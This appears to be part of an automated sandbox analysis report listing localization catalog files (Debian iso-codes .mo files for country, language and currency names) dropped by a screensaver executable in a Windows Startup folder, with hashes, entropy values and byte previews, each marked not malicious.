                                                                                                    Preview:........R...........m...<...............................................%.......7.......G.......V.......f.......t...............................................................................................$.......3.......E.......P.......].......j.......y.......................................................................................................%.......1.......A.......Q.......a.......o.......~.......................................................................................!.......2.......B.......Q.......[.......i.......r.......................................................................................................9.......H.......S.......].......l...U...|.......................................!.......?.......[.......u.......................................................".......<.......Q.......e.......t...&...................................................................F.......b... ...v...............................................................".......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 141 messages, Project-Id-Version: iso_639-3 '\320\220\320\261\320\272\320\260\320\260\320\267'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6401
                                                                                                    Entropy (8bit):4.917997010644627
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:QR0AhH16aCWQ70uaru//wB9IbO0wjPXCCuj9MCjbQUBPlzOCuUhqFOZ:QR0a4xWQ7da6nfO0wjPnujedUrtu88OZ
                                                                                                    MD5:30E9CDBBC37F48B1CBC0079D49BE5591
                                                                                                    SHA1:E054D48E811E97E4AF3706C869FA798566B3DF98
                                                                                                    SHA-256:9FF8308AF901A686D646AEE607EF8BD49741D7BD9C1E6EFCC5BC2A03F29435DE
                                                                                                    SHA-512:C49AC07699097734C15BBF4F7EBD930D118C6C39F772E2990A203DE874EB6570D7D96299D5DD57849D509C353584C5E271127D598E57F422BE2F0216C0CFDF27
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................#.......,.......4.......;.......G.......O.......V.......a.......i.......q.......y.......................................................................................................................................................................#.......*.......3.......:.......P.......X.......a.......g.......n.......u.......{...............................................................................................................................................................%...............6.......:.......@.......H.......P.......[.......f.......o.......y...............................................................................................................................................................................(.......2.......:.......@.......G.......N.......X......._.......o.......w.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\243\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35144
                                                                                                    Entropy (8bit):4.996165237444036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DOQ34Dv6j/Ubjh5wsWP4XdAIzirGePCkXFvppAKfIfjmQO:jhZC+k+ItmsWP4XdAIECk7JWqQO
                                                                                                    MD5:188014B26E06CE3C47152FFD17434781
                                                                                                    SHA1:D4D2AA0C5076813C24DB9AAB9F55DF55FACF81B2
                                                                                                    SHA-256:0674B11E78DF9137171F4DD56A16D3DE4C6BD5BEB36C71185F0877DC44650BB8
                                                                                                    SHA-512:7F15EECFDD07C04ACE30E539A4CF58B9754C7FB18ACA16E969B066AF309A3D958FF5384E67654B10B29EF8A41A21B2D837434D60AAC9F3907141F6A8C03D8FC7
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\244\254\340\245\215\340\244\260\340\244\277\340\244\237\340\244\277\340\244\266 \340\244\205\340\244\202\340\244\237\340\244\276\340\244\260\340\245\215\340\244\237\340\244\277\340\244\225 \340\244\237\340\245\207\340\244\260\340\244\277\340\244\237\340\245\213\340\244\260\340\245\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3916
                                                                                                    Entropy (8bit):5.214047253872838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADnxJzDAcV9vGqIfdvqNuoUWvFi9crXyteZXST0K9AfXC0qxnRJ7OHPq2:qDRyBo49OSTyvTGRIHPb
                                                                                                    MD5:494BE42085990B126E628557F0D5D8F2
                                                                                                    SHA1:671D9DB776A98C88C572D2BE932B0D7C775F7505
                                                                                                    SHA-256:2859B2937F947FABC34AD1B5E3093D90C938AB1DF88C30A5CFA3DF2E5FA420FB
                                                                                                    SHA-512:98C665075F27447FAAF02E1B16E89E0C3990EC429C69791360815CC7AEC13B09B7CC104E1DF17E4EB88CCA37419F588CC96C0F94569A69993C4769FB7D5502A2
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................J...S...j.......v.......K...................[.../...n...........;.......<.......d...4...J.......H.......(...-...%...V...7...|...".......(.......Y.......)...Z...A...............1.......W.......{...f...I.......q...,...........e.......-............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7341 messages, Project-Id-Version: iso_639-3 '\340\244\205\340\244\260\340\245\207\340\244\205\340\244\260\340\245\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):425099
                                                                                                    Entropy (8bit):5.229291858123859
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:joTEfYGTPw4Cyxl1COB3XJQwiGe9zPNly3qBuGlqUJnc0awn+:j6D4H+wiNzHgapq0Q
                                                                                                    MD5:865B80EDE74FB2D7E51E0E4849A7B9D1
                                                                                                    SHA1:97A7ED7C2F3426F6154308A765ADA9B2E5A13576
                                                                                                    SHA-256:0240A3A797690612D4BEB061048CBF98F042C601C8411B32886EE371095D5E40
                                                                                                    SHA-512:82A171B12A4133D37E45C3DC1E1C92C683488116942F9B0BAAF197CCE91D0D56ABDE3D7062355E584A726839CD3A081CB92512605EE7533AE4A5F7AC6F4A1A50
                                                                                                    Malicious:false
                                                                                                    Preview:....................?&...........c.......c.......c.......c.......d.......d.......d.......d.......d......$d......0d......8d......=d......Bd......Hd......Ud......\d......dd......kd......td......~d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......e.......e.......e......&e....../e......5e......De......Je......Qe......Ve......ne......te......|e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......f.......f.......f......"f......*f......2f......8f......Ff......Lf......Qf......Wf......^f......bf......gf......lf.......f.......f.......f.......f.......f.......f.......f.......f.......g.......g......0g......;g......Bg......Kg......Qg......[g......eg......lg......qg......yg......~g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......h......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 263 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12693
                                                                                                    Entropy (8bit):4.861156939698069
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:SkPmheTYqVxSKdkpfuNF6C/WwAhunO0Jboaf/+7/K:SpheDLKcTWwACUA+7/K
                                                                                                    MD5:8F4D81D68B9BBD920CC2C48C68336EFE
                                                                                                    SHA1:4A66923FB7839B9F3381D1846D712AC7183A7114
                                                                                                    SHA-256:53F7738BA312920686A6722597D12CAD99961116DC05DFD9FD8D1EC60C52FE56
                                                                                                    SHA-512:D58460E25FFCC5DB03DDF5A4C334ED31B68CDF80644F3E73C5AE751BB7A54AAB8FA69EACFE8962228870B984329C68BDC87A78ED1B056DF362FE3B58ACA05AE1
                                                                                                    Malicious:false
                                                                                                    Preview:................T...a...................................%.......-.......<.......D.......K.......T......._.......s.......}................................................................................................................................... ...........4.......K.......T.......b.......i...............................................................................................................!.......2.......J.......S.......o.......w.......}...............................................................................................................................%...............J...'...X.......................................................................................................$.......,.......2.......<.......C.......M.......U.......`.......e.......o.......v...................!...........................................................................................................$.......+.......6.......<.......O.......b.......u.......~.......................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):473
                                                                                                    Entropy (8bit):5.183081742581575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWwCuHNNGYxA9Ct0vOuvP0NXzffAQ//R/ApMiZL2AFrwNsXmBQ8KMW0YEiRqAc:icK1xjt02Uk4w/apDLL0NsXmBQWiRap
                                                                                                    MD5:89B5900B10EF8D12C5D6E398BB1DD145
                                                                                                    SHA1:AE792265383DAE51E365277C0E6810AA5C38AB49
                                                                                                    SHA-256:AEA1607A0D9ABA52D70EACFA277A246E3B3A2B880796BFEFE624E60CD5876F0D
                                                                                                    SHA-512:DF52D654233A45F3484D0BA5EBB496D6EF605A3854DEAB90DD2C8B49E21C0DC455F3E85FA0D81BF99196EB8DAA6CE46F560227FD61731FB4B682250F38CAFCC6
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...]...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2008-07-17 03:56+0200.Last-Translator: Nicholas Ng <nbliang@gmail.com>.Language-Team: Malay.Language: ms.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: Pootle 1.1.0..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 50 messages, Project-Id-Version: iso_639-3 'Afrikaans'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2386
                                                                                                    Entropy (8bit):4.697851639574682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:dSgrBBjqXz3q1kECU2S5wd4z+MUZ4Fd+L6jbnI24zA:Nraj3q1RGE+Mpd+L6zEA
                                                                                                    MD5:E2DEF7191B79047422412B6AC80075F2
                                                                                                    SHA1:F1E49E0EE10A08E9823208E00DCB7310983ECE13
                                                                                                    SHA-256:90478F4085B303ACADEE3DD356E88861D22866E68D3390B806721FF908528F3A
                                                                                                    SHA-512:6CDF9C5A32CE7A9164F46BB803E78AB6CE40330867394E5091D0DBC58082EB6EEAABBB7DC00C1BFBB20369E9EE2A831EAF5F7328CDAFFA4E54516ABFB1431CE9
                                                                                                    Malicious:false
                                                                                                    Preview:........2...........C...<.......H.......I.......S.......\.......c.......o.......v.......................................................................................................................................................................#.......+.......4.......;.......C.......N.......Y.......^.......d.......n.......u....................................................................................................................................................................................................... .......&.......-.......3.......;.......E.......N.......W......._.......f.......m.......t.......~...............................................................................................................................................................#.......+.......0.......8.......@.......G.......(.......0...........)...........2.......,................................... ...*..."...............$...........-...............................+.........../...........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 206 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9641
                                                                                                    Entropy (8bit):4.880596319592922
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:evWKC+6MkA1ln6iTocizMg0gYlrBUaNZETW2Wq:eeKy3A1ln6ikcaMgVYlrB54TlWq
                                                                                                    MD5:4CC793CE6402D87718FD9CFBA7B63E5B
                                                                                                    SHA1:28D7CAD41365A1731CDD089AA4B504DCF7093F27
                                                                                                    SHA-256:3A132A5B770937D04D5FEF1021490D8EDE93902A475FB91808AAA0F59C06722C
                                                                                                    SHA-512:1186EB18FBB0395512B75569BFF302A91FB6D643C78CF63AEED76304777A0431D6D900FF83E54E869A80A9537D9F49D59B81085770387FAD353641BF7A8C81EA
                                                                                                    Malicious:false
                                                                                                    Preview:................................P.......Q.......].......e.......m.......|...............................................................................................................................................!.......(.......0.......G.......P.......^.......e.......................................................................................................................4.......<.......B.......O.......Z.......b.......g.......n.......}...............................................................................................................!.......(.......6.......G.......c.......i.......q.......y...........................................................................................!...........................................#.......).......3.......8.......@.......L.......S.......Y......._.......f.......q.......w.......................................................................................................................................................%.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):402
                                                                                                    Entropy (8bit):5.2062627338648655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijZ1YYxA9Ct0vOuvP0NXzffs3k/RRNztXw7AFRdes3XmBQ8KMW0YEi9:i4Z1xxjt02Ukuk/DNzlLnNXmBQWi9
                                                                                                    MD5:463A43FF81A7EE2758BA934821597F7A
                                                                                                    SHA1:B5703BF718BB93A643D16C6E2B1BBB961EB02CFD
                                                                                                    SHA-256:C1C0F1226C3D086BCB1AC54B2F7BCD2452CC6F2CB98728390C7500FDFFA3CA29
                                                                                                    SHA-512:F5E36275266B1A6116B09D9DA98AF68148463BD43A2202C437F72547E9EE2715F4B78C9EF9F010723B6925B74D745575DD642307AE533D125EDAE07C85C645BF
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...X...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-01-05 16:40+0000.Last-Translator: Ramon Casha <ramon.casha@linux.org.mt>.Language-Team: Maltese <mt@li.org>.Language: mt.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 240 messages, Project-Id-Version: iso_639-3 'Akoli'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9694
                                                                                                    Entropy (8bit):4.7337138095065106
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BxsSVC/ajMspqbj4EiUpV7PFo9el5qkrD6LeRAu2e:TsJaIsoI6Fo9el5fa6R3f
                                                                                                    MD5:7E9D6B375A571BEF59F2FC97843EEB0B
                                                                                                    SHA1:AD740C9BE2D915D6D509EEAE0DFBE5F124D2F854
                                                                                                    SHA-256:2B22DE179E800616351844BB14FCBD08D601A409796DB6E61528BD708E927B18
                                                                                                    SHA-512:079C3D89972335C67B3C56C9E3E87F446411844F5F8AE52CA85805BC1503071BC030E8088AF1386C77635F32DF607B5DFE95EA6EBAC573BDECB33AC9DA7F28E0
                                                                                                    Malicious:false
                                                                                                    Preview:....................K...........H.......I.......O.......W.......\.......e.......o.......u.......|.......................................................................................................................................................................!.......'......./.......7.......@.......I.......R.......[.......c.......k.......u.......}.......................................................................................................................................................#.......-.......6.......:.......A.......I.......P.......X.......\.......c.......i.......l.......r.......w.......~.......................................................................................................................................................................+.......5.......=.......C.......\.......p.......x...............................................................................................................................................................".......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 185 messages, Project-Id-Version: iso_3166-1 '\341\200\241\341\200\254\341\200\226\341\200\202\341\200\224\341\200\272\341\200\224\341\200\205\341\200\271\341\200\205\341\200\220\341\200\224\341\200\272\341\200\224\341\200\255\341\200\257\341\200\204\341\200\272\341\200\204\341\200\266'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15588
                                                                                                    Entropy (8bit):4.539454513619587
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tWB1kpMvpdBc4gTmghc3/9+f7d8nxby4nINHuH4dJVWw:S1kmRd/gTcwiw
                                                                                                    MD5:A1E7E63477F8BED25BE4B5EB44F8E034
                                                                                                    SHA1:0D5FE2E7530A2C6CCA770EB70A8224F41AB21518
                                                                                                    SHA-256:5D185E895028265805A657DB557AF88EA9988C77DACE40F11F13DBAF6EADCC64
                                                                                                    SHA-512:65B869C907509587E94F2AE21F23527A5F0821CD9401256244511DBF9C90531FC23C1546FBC982C422A786738EB4FE6283CBF41EE6BD24A9EA9DED2FD24C7521
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................................#.......+.......3.......:.......@.......G.......O.......f.......o.......v.......................................................................................................................!.......&......./.......6.......E.......M.......V......._.......r.......z.......................................................................................................................................!.......,.......1.......;.......B.......P.......W.......].......f.......p.......x...............................................................................................................................................................................(.......3.......>.......E.......N.......W.......\.......b.......m.......w.......~...............................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 151 messages, Project-Id-Version: iso_3166-1 'Apeganitan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6574
                                                                                                    Entropy (8bit):4.657906444671493
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6d0NF8CSMPa4AEEW6pDJONqaBy77wiHzhuaIA:66NqCSM5nEW6pDJONhBy77wiHduaIA
                                                                                                    MD5:7924CD14BBA0EA1CA87683C7447533F1
                                                                                                    SHA1:62D2E67D0B72194034BD7835F0426F2C4AB485A2
                                                                                                    SHA-256:A07834CDD2B75061BAA27F7D373AEF4E958B3680B60B698AFD3294E1C4EDB74E
                                                                                                    SHA-512:3A10710ABAF2AD4819C6B3997AFD53128F7D40EF9A153257FA17C2FD366C7B1FCE4354A1832C0F6B6756299449B27719F318EDFCDBD17D036186F24C96A928AB
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................".......*.......0.......:.......B.......M.......U.......`.......i.......q.......y...............................................................................................................................................(.......0.......;.......C.......H.......O.......^.......f.......o.......x.......................................................................................................................................&.......0.......7.......E.......L.......R.......[.......c.......k.......q.......{...............................................................................................................................................................".......(......./.......7.......>.......G.......R.......Z.......b.......h.......n.......z...............................................................................................................................!.......'.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 182 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8116
                                                                                                    Entropy (8bit):4.761532239698981
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:34LSVuJnYxZaobrNUxbagTqbh8ZE3OQVV:34e4eLa2rSOgTqbh8237V
                                                                                                    MD5:0DF0ACCC8ABE649839AD615ED4C5DDEE
                                                                                                    SHA1:A8E16C00BEF5D39F09D619DF7C65FD0281BEE6D7
                                                                                                    SHA-256:33CDC8437D875DAD79D2737946ACAE98136404ED2F26B8266BC0091D4FBE1BB6
                                                                                                    SHA-512:3C151A0B6F94992F7FB632E4C71C040E1FD2DF14EAAB0ED071D761ECB0DB9D6D2914E98AC5F7CE80D9908BAA4F85A1F9CA9BEACCD0A171CCA46946E527B1B839
                                                                                                    Malicious:false
                                                                                                    Preview:........................|.......h.......i.......u.......}.......................................................................................................................................................6.......?.......F.......O.......\.......d.......m.......v.......}.......................................................................................................................................'.......9.......A.......J.......i.......n.......v.......}............................................................................................................................................................... .......(......./.......5.......=.......C.......J.......U.......[.......d.......k.......v.......}.......................................................................................................................................................!.......,.......4.......?.......G.......O.......U.......[.......g.......s.......}...............................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 85 messages, Project-Id-Version: iso_15924 'arabisk'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4069
                                                                                                    Entropy (8bit):4.757440790502466
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YNgEZWFzCJbO8NqWc3JlkIfwbFVDem8mFt:oWRYxqWakIUVDemTt
                                                                                                    MD5:C4D91C722AA046C4B3D3439635BE74F2
                                                                                                    SHA1:9DEE3DBBCEF1E3F93F840683C3DC71A8EE0E72E5
                                                                                                    SHA-256:644874198E5F41EB0D45E774C967A5E7C26653E715AFB5A211679854FA1108A7
                                                                                                    SHA-512:747845620970A6393AC4CEFE0A417C4D9529F3177A58CB79E385FB75F1D9DCBE8D30E0E4EBA5A0C94D98DABF2FF07AC010F2D3192AE629E093BF5D48046DB2F6
                                                                                                    Malicious:false
                                                                                                    Preview:........U...........q...l.......0.......1.......8.......A.......I.......R.......X.......`.......l.......u.......|.......................................................................................................".......+.......<.......N.......c.......n.......u.......{.......................................................................................................................................................!.......3.......=.......I.......P.......V.......a.......m.......s.......{...............................................................................................................................!.......'...............6.......=.......B.......J...%...S.......y.......}.......................p.......x...............................................................................................................................................8.......U.......].......h.......r...............................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23547
                                                                                                    Entropy (8bit):5.01398047589987
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosOvD0pnaGeSucY46nbjz5wsWP48WAINiZGAOB9ikediAG1n9:0oF6na1SucY48fmsWP48WAIDgkediAc9
                                                                                                    MD5:61E7011E5DE285373A18EE39FE037C23
                                                                                                    SHA1:2D243146BA3AFA6F3CA873EF3D9FD1465E423729
                                                                                                    SHA-256:02B9F7667DE319EC22A2057FFE7246AC78C8212D383358F7EDA9FC08974FC11F
                                                                                                    SHA-512:B9D79457536F1C103AA7198DFCAA2A15C5EF666C6524605107ED0F498FC53649BF2E816CE160A8FC17ACE31DAEB9DFB275B0E61198A5171E7358BAD6363D648C
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 20 messages, Project-Id-Version: iso_3166-2 'S\303\266dra Karelen'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1305
                                                                                                    Entropy (8bit):4.965900955881278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:FBXl2Vi3OigtIt7GlEqP0o0hXPXSt0UBixvCmYIXmyAuT5fe0PcmkgFl:spiOEE07hX/UJhpy1Je4cmJf
                                                                                                    MD5:63259039EEF2E167502F7CC77F25CC59
                                                                                                    SHA1:1ED315350C3C4D840D09029EFBCCB5F045965515
                                                                                                    SHA-256:47F6877518E3880ECF2023B6ABAF7EC73934C6D43667FF774D592D20C1DAEDB3
                                                                                                    SHA-512:F34B46F27D6E4BBB95921C0A07A2973BB2169F17B1516199CD524E160DD828FE43AA5EEE9A33AB5A3CCF9285BF10B75C09BF2727397D467430004EBE4EEB3733
                                                                                                    Malicious:false
                                                                                                    Preview:........................\............................................................... .......,.......8.......J.......P.......Z.......d.......t...........................................=...........................%.......4.......?.......T.......k.......}................................................................................................................................................................................................................Etel.-Karjala.Etel.-Pohjanmaa.Etel.-Savo.Kainuu.Kanta-H.me.Keski-Pohjanmaa.Keski-Suomi.Kymenlaakso.Landskapet .land.Lappi.Pirkanmaa.Pohjanmaa.Pohjois-Karjala.Pohjois-Pohjanmaa.Pohjois-Savo.P.ij.t-H.me.Satakunta.Uusimaa.Varsinais-Suomi.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: nb_NO.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britisk Antarktis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2838
                                                                                                    Entropy (8bit):5.20952424100027
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3liU9V+vGqIfdvqN5CoU3RIJBwS3+0KlWzmE0y2HZk:rLvEGV+yaCowIfwS+07B0Jk
                                                                                                    MD5:1591E03C5126728FDB0DF1E6D13C4995
                                                                                                    SHA1:7FC0E8A1BEE8DBE24BB41AFFF805A2FCE65CE337
                                                                                                    SHA-256:FA8F74A3429ABA1928C88310E8DB953100AE45AC748C2D4758B973C4EE61098B
                                                                                                    SHA-512:E137876103AAB3379E4FDA8BE764DED5763928264B70A52BCE210074CB206E2BCA145B0C3DAB44104A67EF96E4ED74D43C8048A0573EC27B6A04040118B1651E
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................".......4...........?...=...Y................................................... ...........;.......T.......a.......n...................&...............................................0...'.......X...$...q...........3............................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 155 messages, Project-Id-Version: iso_4217 'ADB-regneenhet'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8569
                                                                                                    Entropy (8bit):4.863846403406804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fr+Y9DzGVF5LlglvJbGEABynC0dIJJRLDfct3oDWaO:CHP0g3B4VALGoKx
                                                                                                    MD5:A494EA0256912BCD7A4A9CE5E2D295E5
                                                                                                    SHA1:4411228B185D80BA5A15B01E3F1DB4FB131B12E7
                                                                                                    SHA-256:5F20C1D7588163B1D8670D213E7B4C68412C3E2A66E9196AF9F2BD1DEF9A382E
                                                                                                    SHA-512:16EED9E2EB983FD17B6EAD3952A8EF2B9DBFD7F9D7B6212739A79A32A5E7E9299F8B7C13AAD6D5AB61565ED64A5387C11CF4C8BB19A5C91306D31CE83781DCBC
                                                                                                    Malicious:false
                                                                                                    Preview:................................................-.......5.......D.......S.......a.......s.......................................................................................................!.......1.......@.......J.......Z.......p...0...}...............................................................................(...............=.......C.......R.......W.......m.......|...............................................................................................................".......0.......=.......J.......V.......f.......v.......................................................................................................................................................;.......H.......X.......k.......q.......w.......................................................................................,.......6.......=.......N.......\.......l.......u...............................................................................................................................'.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 134 messages, Project-Id-Version: iso_639-3 'afar'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5570
                                                                                                    Entropy (8bit):4.603296312370474
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2taRDau5mBBoRsl4L/rglgTHe5BZQx9GifTrOhM5w+LKoUuDb2aaKb:COauAbK/rg2DYy93rOSsoUuVaKb
                                                                                                    MD5:B193382218EE559BF4DD86843725C46C
                                                                                                    SHA1:AFBB1CD1845BDFCA1EE8241B736CE4E289E2CE15
                                                                                                    SHA-256:97A8E212B4DB60727800571F7A79A53EAF7042D0DCCB53EF03549122D772CCA8
                                                                                                    SHA-512:744D9F67874BE943CCFA9F4C8BC79B463586DE5483FAAB7C0B8D8DD21966CAFEA9F20F21F6B06AE529FFA8001841602A893DB1A15A14B29FA8D82FC1B437A350
                                                                                                    Malicious:false
